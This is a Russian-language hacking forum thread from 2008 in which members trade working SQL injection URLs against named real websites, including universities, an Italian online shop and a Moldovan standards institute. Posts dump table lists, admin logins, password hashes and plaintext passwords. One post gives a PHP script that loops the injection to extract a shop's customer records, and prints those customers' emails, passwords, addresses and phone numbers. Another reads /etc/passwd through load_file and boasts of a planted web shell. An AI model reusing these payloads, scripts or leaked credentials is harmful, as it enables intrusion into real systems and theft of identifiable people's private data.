SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    5.0.45-log
     
    1 person likes this.
  2. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    А дальше?

    Code:
    http://www.remhq.com/news_story.php?id=-894'+union+select+1,concat_ws(username,0x3a,password,0x3a,accesslevel),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+hero_users+limit+0,1/*
     
    2 people like this.
  3. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    исключительно .edu

    Lake Superior State University
    Code:
    http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+29,1/*
    PR=7
    5.0.20
    -------------------------------------------------------------------

    National Center for Supercomputing Applications at the University of Illinois(во как!)
    Code:
    http://www.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1000+union+select+1,version(),3,4,5,6,7,8,9,10/*
    PR=7
    5.0.45-log 3
    пути:
    Code:
    /afs/ncsa.uiuc.edu/web/www-2006/site/htdocs/AboutUs/People/mailto_func.php
    -------------------------------------------------------------------

    University of Pennsylvania
    Code:
    http://asam.sas.upenn.edu/detail.php?id=-861+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11--
    PR=7
    4.1.15-standard
    пути:
    Code:
    /var/www/ASAM/detail.php 
     
    2 people like this.
  4. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    prontospesa.it
    средних размеров онлайн шоп
    Code:
    http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646
    
    таблицы:
    Code:
    DM-Reward
    DM-Target-Campagna
    DM-Campagne
    ReachKeyGenerale
    dtproperties
    Acquisti
    Acquisto
    CAP
    Carrelli
    Carrello
    Commessi
    Config
    CostiConsegna
    CRM
    ECommerce
    ECommerce1
    ECommerce3
    IVA
    ListaPersonale
    MailAccount
    Offerta
    Offerte
    Operatori
    ReachKey
    Risultati
    SenzaEAN
    Supermarket
    SuperMarket_Cat
    Supermarket0
    sysconstraints
    syssegments
    ToDo
    Utenti
    Utenti_OnLine
    
    кто не ленивый может найдет где нить там кт ;)Мне лично лень :)
    Вытягиваем из таблицы Utenti - email+pass+всякая кадабра типа адреса:
    Code:
    http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646%27+OR+1=(select+top+1+cast(IdUtente+as%20nvarchar)%2B%27%3A%27%2Bcast(EMail+as%20nvarchar)%2B%27%3A%27%2Bcast(Password+as%20nvarchar)%2B%27%3A%27%2Bcast(Stato+as%20nvarchar)%2B%27%3A%27%2Bcast(Nome+as%20nvarchar)%2B%27%3A%27%2Bcast(Cognome+as%20nvarchar)%2B%27%3A%27%2Bcast(RagioneSociale+as%20nvarchar)%2B%27%3A%27%2Bcast(Indirizzo+as%20nvarchar)%2B%27%3A%27%2Bcast(Citta+as%20nvarchar)%2B%27%3A%27%2Bcast(Cap+as%20nvarchar)%2B%27%3A%27%2Bcast(Provincia+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono1+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono2+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono3+as%20nvarchar)+from+Utenti+where+IdUtente=1)--
    
    скрипт на Php для дампинга таблицы Utenti
    PHP:
    <?
     
    set_time_limit(0);
    function 
    send_get($get_url)
    {
    $ch curl_init();
    curl_setopt($chCURLOPT_URL$get_url);
    curl_setopt($ch,CURLOPT_COOKIEFILE,"./htdocs/1.txt");
    curl_setopt($chCURLOPT_HEADER,0);
    curl_setopt($chCURLOPT_CONNECTTIMEOUT,30);
    curl_setopt($chCURLOPT_FOLLOWLOCATION,0);
    curl_setopt($chCURLOPT_RETURNTRANSFER,1);
    return 
    $data curl_exec($ch);
    }
    $postfix 0;
    $filename "base".$postfix.".txt";
    $desp fopen ($filename,"a+");
    for (
    $id=0;$id<30000;$id++){
    $get_url="http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646%27+OR+1=(select+top+1+cast(IdUtente+as%20nvarchar)%2B%27%3A%27%2Bcast(EMail+as%20nvarchar)%2B%27%3A%27%2Bcast(Password+as%20nvarchar)%2B%27%3A%27%2Bcast(Stato+as%20nvarchar)%2B%27%3A%27%2Bcast(Nome+as%20nvarchar)%2B%27%3A%27%2Bcast(Cognome+as%20nvarchar)%2B%27%3A%27%2Bcast(RagioneSociale+as%20nvarchar)%2B%27%3A%27%2Bcast(Indirizzo+as%20nvarchar)%2B%27%3A%27%2Bcast(Citta+as%20nvarchar)%2B%27%3A%27%2Bcast(Cap+as%20nvarchar)%2B%27%3A%27%2Bcast(Provincia+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono1+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono2+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono3+as%20nvarchar)+from+Utenti+where+IdUtente=".$id.")--";
    $str=send_get($get_url);
    if (
    preg_match("/nvarchar\040'(.*)'\040in\040una\040colonna/",$str,$matches)) {
    echo 
    $matches[1];
    fputs($desp,$matches[1]);
    fputs($desp,"\n");
    }
    }
    fclose($desp);
    ?>
    Вотс чего получаем на выходе :
    Code:
    1:[email protected]:fabio:1:Elena:Abbà::Via BOVE 14:Torino:10129:TO:011 5097327::
    3:[email protected]:micoledo:1:Elsa:Abbena::S.da della bocchetta11:Sciolze:10090:TO:011 9603558::
    9:[email protected]:grages64:1:Matteo:Adinolfi::C.so Corsica 45/C:Torino:10135:TO:0113170570::3290848091
    12:[email protected]:nilde:1:Nilde:Affatato::strada del Drosso 140/D:Torino:10135:TO:0113472847::3335336138
    
     
    2 people like this.
  5. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://shariki.com/news/?id=-1{SQLINJ}

    Database Version: 5.0.67-log
    Database name: u58240
    User name: [email protected]
     
    1 person likes this.
  6. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.adultfyi.com/read.php?ID=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
    Code:
    http://www.yesilyurtlar.com.tr/en/urun.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
     
    2 people like this.
  7. N1K70

    N1K70 Banned

    Joined:
    2 Jan 2008
    Messages:
    161
    Likes Received:
    76
    Reputations:
    21
    Code:
    http://www.webhoster4u.de/server.php?id=-132+union+all+select+database(),version()--
    4.1.22-standard ;)
     
    2 people like this.
  8. =HALK=

    =HALK= Member

    Joined:
    30 Oct 2008
    Messages:
    27
    Likes Received:
    27
    Reputations:
    40
    Pr4
    Code:
    http://www.thenaturenetwork.net/news/news.php?news_id=-1+union+select+1,2,3,4,5,concat_ws(0xb,version(),user(),database()),7,8,9,10,11,12,13,14,15,16--
    
    вот таблицы с колонками:
    http://tables-columns.narod.ru/thenaturenetwork.net.txt
     
    1 person likes this.
  9. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    http://www.icehw.net/article.php?id=...,13,14,15,16--

    version: 5.0.22-Debian_0ubuntu6.06.3-log
    user: icehw@localhost
    database: icehw_main

    table: login
    Concat_ws(0x3a,ID,username,PASSWORD)

    http://www.eajc.org/analytics_show_r.php?id=-27+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,name,pass),7,8,9+from+adbm_user--

    admin:1d1ac3f687c1572b5654e3fbd502a7c9

    http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+users+limit+2,1--

    login:brianficek
    pass:85688717ef4fab9
     
  10. lastsmile

    lastsmile Elder - Старейшина

    Joined:
    22 Sep 2007
    Messages:
    40
    Likes Received:
    10
    Reputations:
    0
    НОВЫЕ ТЕХНОЛОГИИ ЗАЩИТЫ ИНФОРМАЦИИ-7000
    Яндекс тИЦ 240
    Google Page Rank 5


    Code:
    http://7000.ru/produce/details3.php?prod_id=470&id=-1+union+select+version(),2,3,4
    
    version() 5.0.51a
    user() w7000@localhost
    database() w7000

    Code:
    7000_news
    1.	id
    2.	news_text
    3.	news_date
    4.	mode1
    5.	mode2
    6.	news_link
    7.	news_title
    7000_stuff_messages 
    1.	id
    2.	section
    3.	date
    4.	login
    5.	parent
    6.	topic
    7.	message
    8.	made
    9.	city
    10.	type
    11.	quality
    12.	price
    13.	seen
    7000_stuff_sections 
    1.	id
    2.	title
    7000_stuff_users 
    1.	id
    2.	login
    3.	password
    4.	email
    5.	address
    6.	occupation
    7.	homepage
    8.	interests
    9.	icq
    10.	sendnews
    @x0Elvarc 
    1.	id
    2.	title
    TCat 
    1.	id
    2.	title
    3.	id_cat
    4.	pos
    banner_buys 
    1.	id
    2.	bid
    3.	sid
    4.	uid
    5.	ip
    6.	crt
    7.	extra
    banner_click 
    1.	id
    2.	bid
    3.	ip
    4.	crt
    5.	sid
    6.	zoneid
    banner_content 
    1.	id
    2.	path
    3.	btype
    4.	header
    5.	crt
    6.	url
    banner_main 
    1.	id
    2.	zoneid
    3.	crt
    4.	shows
    5.	bansrc
    6.	on_off
    7.	frequency
    banner_sessions 
    1.	id
    2.	sid
    3.	ip
    4.	crt
    banner_sites 
    1.	id
    2.	description
    3.	url
    banner_source 
    1.	id
    2.	sizev
    3.	sizeh
    4.	type
    banner_user 
    1.	id
    2.	bid
    3.	crt
    4.	uid
    5.	bansid
    6.	shows
    banner_zones 
    1.	id
    2.	siteid
    3.	width
    4.	on_off
    5.	description
    banscanusers 
    1.	id
    2.	name
    3.	mail
    4.	www
    5.	phone
    6.	ip
    7.	login
    8.	pass
    cat 
    1.	id
    2.	name
    3.	text
    4.	rz
    5.	vis
    6.	konfig
    7.	pos
    8.	ismain
    9.	textmain
    10.	photomain
    catalog 
    1.	id
    2.	parent_id
    3.	is_section
    4.	title
    5.	price
    categbd 
    1.	number
    2.	cat
    categbd1 
    1.	nomer
    2.	name
    3.	subcat
    4.	dateadd
    5.	lang
    6.	homepage
    7.	ratadm
    8.	ratusr
    9.	download
    10.	url
    11.	description
    
    далее уже влом искать что-то....
     
    2 people like this.
  11. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    А че там дальше то копать?

    Пошли юзвери:
    Code:
    http://7000.ru/produce/details3.php?prod_id=470&id=-1+union+select+concat_ws(login,0x3a,password),2,3,4+from+7000_stuff_users+limit+01--
    Пассы в открытом виде :)
     
  12. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    продолжаем .edu инъекции...

    х.з что...
    Code:
    http://webscript.princeton.edu/~paw/memorials/memdisplay.php?id=-1047+union+select+1,2,3,4,version(),6,7,8,9/*
    4.1.12-log
    PR=0
    ----------------------------------------------------------------

    Institute for NanoBioTechnology
    Code:
    http://inbt.jhu.edu/facultyexpertise.php?id=personalresult&usr=-45+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
    4.1.22-standard
    PR=5
    ----------------------------------------------------------------

    Portland State University
    Code:
    http://web.pdx.edu/~salp/salp_saga/calendar.php?action=view&id=-1143+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--
    5.0.37
    PR=4
    ----------------------------------------------------------------

    х.з что, да еще и со слепой инъекцией...
    Code:
    http://cils.exploratorium.edu/cils/page.php?ID=148+union+select+1,2,3,4--
    PR=6
     
    4 people like this.
  13. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    standard.md
    ппц, национальный институт стандартизации и всей фигни и с дырками, куда катится молднет =\
    Вобще вывод непонятно какой
    http://www.standard.md/pageview.php?l=ru&idc=-1+UNION+SELECT+VERSION()/*
    Непонятно какая версия... Но
    http://www.standard.md/pageview.php?l=ru&idc=-1+UNION+SELECT+VERSION()+FROM+information_schema.tables/*
    Работает, значит 5, а кому надо разберётся и с выводом :)
     
    1 person likes this.
  14. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    пончик ты даже кол-во полей не подобрал... еще и говоришь что вывод непонятно какой
     
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+version()/*
    как бэ вывод в заголовке
    Пончик, ты забыл там кавычку поставить

    http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+concat(username,':',password)+from+users/*

    http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/etc/passwd')+from+users/*
    Так как там фряха, можно средствами load_file читать дериктории, находим httpd.conf
    http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/usr/local/etc/apache2/httpd.conf')+from+users/*
    Смотри сорц, находим строку
    DocumentRoot "/usr/home/insm/www"
    читаем эту диру
    http://www.standard.md/pageview.php?l=ru&idc=-1'+union+select+load_file('/usr/home/insm/www')+from+users/*
    Щас копаю, воде в веб нельзя залить файл
    PS нашёл, папка public доступна на запись))
    Вобще ссылку на шелл кидать не буду, те кто умеют зальют =)

    Safe mode: OFF
    Disable functions: 0
    OS: FreeBSD gw.standard.md 5.2.1-RELEASE-p11 FreeBSD 5.2.1-RELEASE-p11 #0: Fri Oct 15 09:17:15 EEST 2004 [email protected]:/usr/obj/usr/src/sys/standard.v0 i386

    PPS если чё, то там allow_url_fopen = On и в штацессе закрыт доступ к php файлам, решается заливкой phtml
     
    #6715 Spyder, 2 Nov 2008
    Last edited: 3 Nov 2008
    3 people like this.
  16. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.sticma.com.br/cursos_ver.php?id=-1+union+select+1,2,concat_ws(0x3a3a,nome,Senha,email),4,5,6,7,8,9,10,11+from+usuario+limit+0,1
    login:admin
    pass:sind2008

    Админка:http://www.sticma.com.br/admin

    Microsoft-IIS/6.0. PHP/5.2.5
    Windows NT WINDOWS 5.2 build 3790
    NOT SECURE

    Достаточно грамотно выставлены права. Выше корня конкретного хоста не лезет.

    Есть возможность залить шелл.
    ---------------------------------------------------------------

    P.S. Студия создавша сей ресурс сама страдает sql-inj.
    http://www.fonteweb.com.br/solucoes.php?id=-1+union+select+1,concat_ws(0x3a3a,nome,Senha,email),3,4,5,6,7+from+usuario+limit+0,1
    Хеш не подбрутился. Да и дальше копать не стал.
    Но походу у них все проекты плешивые...
     
    1 person likes this.
  17. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    спасибо, поржал
    http://www.standard.md/fusion_cr/filemanager/index.php
    по большому счету заливка скрипта осуществима :)))
    пс за собой прибераемся
    http://www.standard.md/public/2.txt
    http://www.standard.md/public/spyder.php
    http://www.standard.md/public/spyder.phtml
     
    #6717 Fuckel, 3 Nov 2008
    Last edited: 3 Nov 2008
  18. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    ::::::::::::::::::::Америка::::::::::::::::::::::::::
    root ; 32b4889c7569b9c5

    root ; 2e772d7646f9c841

    admin ; puhhema

    ::::::::::::::::::::Молдавия::::::::::::::::::::::::::
    Поле password присутствует, однако почему то не выводится...


    ::::::::::::::::::::name::::::::::::::::::::::::::
    ::::::::::::::::::::ru::::::::::::::::::::::::::
    http://www.2kaudit.ru/login.php
    Вход вроде бы тут, однако ни один пароль не подошел!

     
    1 person likes this.
  19. xPriZrAkx

    xPriZrAkx Member

    Joined:
    16 Mar 2007
    Messages:
    8
    Likes Received:
    8
    Reputations:
    0
    5.0.32-Debian_7etch6-log

    847 Таблицы

    root:*99619676BCC438CF465A8CADAB3A1305E6A44AB9

    -------------------------------------------------------------------------------------------------------------------------------------------

    5.0.51b 4

    57 Таблиц

    -------------------------------------------------------------------------------------------------------------------------------------------

    5.0.27-standard

    -------------------------------------------------------------------------------------------------------------------------------------------

    4.1.22

    -------------------------------------------------------------------------------------------------------------------------------------------

    4.1.20

    -------------------------------------------------------------------------------------------------------------------------------------------

    4.1.20-max-log

    -------------------------------------------------------------------------------------------------------------------------------------------

    4.0.17
     
    #6719 xPriZrAkx, 3 Nov 2008
    Last edited: 3 Nov 2008
    2 people like this.
  20. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Fuckel, над чем ты поржал? над тем что ты можешь залить шелл только через файл менеджер?))) Давай вместе над этим поржём)

    пс за собой прибераемся

    С хуя ли я должен свой шелл удалять? :D
    Пиздец хакеров развелось, найдут файл менеджер и уже выйбываются
     
    1 person likes this.
Thread Status:
Not open for further replies.